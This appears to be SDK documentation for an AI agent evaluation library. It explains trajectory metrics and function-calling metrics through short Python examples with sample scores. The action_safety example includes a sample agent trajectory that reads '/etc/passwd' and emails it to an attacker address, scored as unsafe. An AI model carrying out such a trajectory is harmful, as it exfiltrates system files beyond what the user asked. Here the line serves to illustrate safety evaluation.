Agents and Function Calling: SDK Evaluation Metrics

11 metrics for evaluating agent trajectories, tool use, reasoning quality, and function call correctness. All run locally via evaluate().

📝

TL;DR

7 agent trajectory metrics (continuous 0.0-1.0): task completion, efficiency, tool selection, safety, reasoning
4 function calling metrics (binary 0/1): name match, parameter validation, accuracy, exact match
task_completion, action_safety, and reasoning_quality support augment=True

These metrics evaluate how well an agent performed a task and whether it called the right functions with the right parameters.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123 from SFO to JFK on March 15. Confirmation sent to user.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
print(result.score)   # 0.95

Agent Trajectory Metrics

Pass the full agent trajectory (tool calls, intermediate steps, final output) as output, and the task description as context. All return 0.0 to 1.0.

Metric	What it measures
`task_completion`	Whether the agent completed the assigned task
`step_efficiency`	Whether the agent reached its goal in minimal steps
`tool_selection_accuracy`	Whether the agent selected the correct tools
`trajectory_score`	Overall trajectory quality covering tool use, ordering, and progress
`goal_progress`	How much progress was made toward the goal
`action_safety`	Whether the agent’s actions are safe and authorized
`reasoning_quality`	Quality of the agent’s reasoning chain

task_completion

Whether the agent completed the assigned task. Supports augment=True.

result = evaluate(
    "task_completion",
    output="Created Jira ticket PROJ-452 'Fix login timeout' assigned to @alice.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.97

step_efficiency

Whether the agent reached its goal in minimal steps without unnecessary detours.

result = evaluate(
    "step_efficiency",
    output="Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.92

tool_selection_accuracy

Whether the agent selected the correct tools for the task.

result = evaluate(
    "tool_selection_accuracy",
    output="Called: [search_flights, book_flight, send_confirmation]",
    context="User asked to book a flight and send a confirmation email.",
    expected_output="[search_flights, book_flight, send_confirmation]",
)
# score → 1.0

trajectory_score

Overall trajectory quality covering tool use, ordering, and task progress.

result = evaluate(
    "trajectory_score",
    output="Step 1: search_db('revenue Q4') → $2.3M. Step 2: generate_chart(data) → chart.png. Step 3: send_email(to='cfo', attachment='chart.png').",
    context="User asked: pull Q4 revenue, chart it, and email the chart to the CFO.",
)
# score → 0.94

goal_progress

How much progress was made, even if the task wasn’t fully completed. Useful for partial-credit scoring.

result = evaluate(
    "goal_progress",
    output="Step 1: search_flights('SFO','JFK','2025-03-15') → 3 results. Step 2: agent timed out.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
# score → 0.45

action_safety

Whether the agent’s actions are safe — no destructive operations, data leaks, or unauthorized access. Supports augment=True.

result = evaluate(
    "action_safety",
    output="Step 1: read_file('/etc/passwd'). Step 2: send_email(to='external@attacker.com', body=contents).",
    context="User asked to check system health.",
)
# score → 0.05

reasoning_quality

Quality of the agent’s reasoning chain — logical, well-structured, leads to the correct conclusion. Supports augment=True.

result = evaluate(
    "reasoning_quality",
    output="Thought: User needs Q4 revenue. I should query the database first. Action: query_db('SELECT SUM(revenue) FROM sales WHERE quarter=Q4') → $2.3M.",
    context="User asked: what was our Q4 revenue?",
)
# score → 0.88

Function Calling Metrics

Validate whether the agent called the right function with the right parameters. All are binary (0 or 1). Pass actual and expected function calls as JSON strings.

Metric	What it checks
`function_name_match`	Whether the function name matches (ignores parameters)
`parameter_validation`	Whether function parameters match (names and values)
`function_call_accuracy`	Overall correctness — function name and parameters together
`function_call_exact_match`	Strict exact match — JSON must be identical

function_name_match

Whether the function name matches. Ignores parameters.

result = evaluate(
    "function_name_match",
    output='{"name": "get_weather", "arguments": {"city": "NYC"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco"}}',
)
# score → 1.0 (name matches, params ignored)

parameter_validation

Whether function parameters match (names and values).

result = evaluate(
    "parameter_validation",
    output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
)
# score → 1.0

function_call_accuracy

Overall correctness — function name and parameters together.

result = evaluate(
    "function_call_accuracy",
    output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
    expected_output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
)
# score → 1.0

function_call_exact_match

Strict exact match — JSON must be identical.

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 1.0

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 3}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 0.0 (top_k differs)

Augmented Evaluation

task_completion, action_safety, and reasoning_quality support augment=True. This runs the local heuristic first, then refines with an LLM.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123. Confirmation #BK-9921 sent to user@email.com.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15 and email the confirmation.",
    model="gemini/gemini-2.5-flash",
    augment=True,
)

print(result.metadata["engine"])  # "local+llm"

Questions & Discussion

Agents and Function Calling: SDK Evaluation Metrics

Agent Trajectory Metrics

task_completion

step_efficiency

tool_selection_accuracy

trajectory_score

goal_progress

action_safety

reasoning_quality

Function Calling Metrics

function_name_match

parameter_validation

function_call_accuracy

function_call_exact_match

Augmented Evaluation

RAG Metrics

Hallucination

Guardrails

Agent Trajectory Metrics

task_completion

step_efficiency

tool_selection_accuracy

trajectory_score

goal_progress

action_safety

reasoning_quality

Function Calling Metrics

function_name_match

parameter_validation

function_call_accuracy

function_call_exact_match

Augmented Evaluation

Related

RAG Metrics

Hallucination

Guardrails